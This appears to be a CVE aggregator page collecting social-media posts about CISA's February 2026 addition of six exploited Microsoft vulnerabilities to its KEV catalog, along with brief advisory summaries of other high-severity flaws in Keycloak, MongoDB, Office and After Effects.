🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:24.000Z ##

CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

thehackerwire@mastodon.social at 2026-02-10T23:28:25.000Z ##

🟠 CVE-2026-21519 - High (7.8)

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21519
CVE-2026-21519

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:24.000Z ##

CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21533
(7.8 HIGH)

EPSS: 1.55%

updated 2026-02-10T21:31:29

11 posts

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

1 repos

https://github.com/Pairs34/RDPVulnarableCheck

thehackerwire@mastodon.social at 2026-02-10T23:28:06.000Z ##

🟠 CVE-2026-21533 - High (7.8)

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:40.000Z ##

🔐 CVE-2026-21533
CVE-2026-21533

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:09.000Z ##

CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

thehackerwire@mastodon.social at 2026-02-10T23:28:06.000Z ##

🟠 CVE-2026-21533 - High (7.8)

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:40.000Z ##

🔐 CVE-2026-21533
CVE-2026-21533

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:09.000Z ##

CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-25577
(7.5 HIGH)

EPSS: 0.05%

updated 2026-02-10T19:57:02

2 posts

### Summary The `cookies` property in `emmett_core.http.wrappers.Request` does not handle `CookieError` exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service. ### Details **Location:** `emmett_core/http/wrappers/__init__.py` (line 64) **Vulnerable Code:** ```python @cachedprop def cookies(self) -> Simple

thehackerwire@mastodon.social at 2026-02-10T23:25:41.000Z ##

🟠 CVE-2026-25577 - High (7.5)

Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:25:41.000Z ##

🟠 CVE-2026-25577 - High (7.5)

Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1529
(8.1 HIGH)

EPSS: 0.02%

updated 2026-02-10T18:35:21

3 posts

A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allows the attacker to successfully self-register into an unauthorized organization, leading to unauthorized access.

2 repos

https://github.com/0x240x23elu/CVE-2026-1529

https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

lobsters@mastodon.social at 2026-02-11T13:10:12.000Z ##

CVE-2026-1529 - keycloak: unauthorized organization registration via improper invitation token validation lobste.rs/s/ghqflm #security
cvefeed.io/vuln/detail/CVE-202

##

lobsters@mastodon.social at 2026-02-11T13:10:12.000Z ##

CVE-2026-1529 - keycloak: unauthorized organization registration via improper invitation token validation lobste.rs/s/ghqflm #security
cvefeed.io/vuln/detail/CVE-202

##

thehackerwire@mastodon.social at 2026-02-09T20:24:21.000Z ##

🟠 CVE-2026-1529 - High (8.1)

A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allow...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1486
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:35:16

2 posts

A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer) retrieves the IdP configuration but does not filter for isEnabled=false. If an administrator disables an IdP (e.g., due to a compromise or offboarding)

thehackerwire@mastodon.social at 2026-02-09T20:24:11.000Z ##

🟠 CVE-2026-1486 - High (8.8)

A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T20:23:50.000Z ##

🟠 CVE-2026-1486 - High (8.8)

A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25611
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:30:54

2 posts

A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.

thehackerwire@mastodon.social at 2026-02-10T23:25:50.000Z ##

🟠 CVE-2026-25611 - High (7.5)

A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:25:50.000Z ##

🟠 CVE-2026-25611 - High (7.5)

A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21260
(7.5 HIGH)

EPSS: 0.08%

updated 2026-02-10T18:30:52

2 posts

Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.

thehackerwire@mastodon.social at 2026-02-11T01:25:15.000Z ##

🟠 CVE-2026-21260 - High (7.5)

Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:25:15.000Z ##

🟠 CVE-2026-21260 - High (7.5)

Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21259
(7.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:30:52

2 posts

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.

thehackerwire@mastodon.social at 2026-02-11T01:21:12.000Z ##

🟠 CVE-2026-21259 - High (7.8)

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:21:12.000Z ##

🟠 CVE-2026-21259 - High (7.8)

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21322
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:52

2 posts

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:35:45.000Z ##

🟠 CVE-2026-21322 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:35:45.000Z ##

🟠 CVE-2026-21322 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21318
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:52

2 posts

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:16:39.000Z ##

🟠 CVE-2026-21318 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:16:39.000Z ##

🟠 CVE-2026-21318 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21330
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:52

2 posts

After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:16:30.000Z ##

🟠 CVE-2026-21330 - High (7.8)

After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:16:30.000Z ##

🟠 CVE-2026-21330 - High (7.8)

After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21327
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:52

2 posts

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:16:03.000Z ##

🟠 CVE-2026-21327 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:16:03.000Z ##

🟠 CVE-2026-21327 - High (7.8)

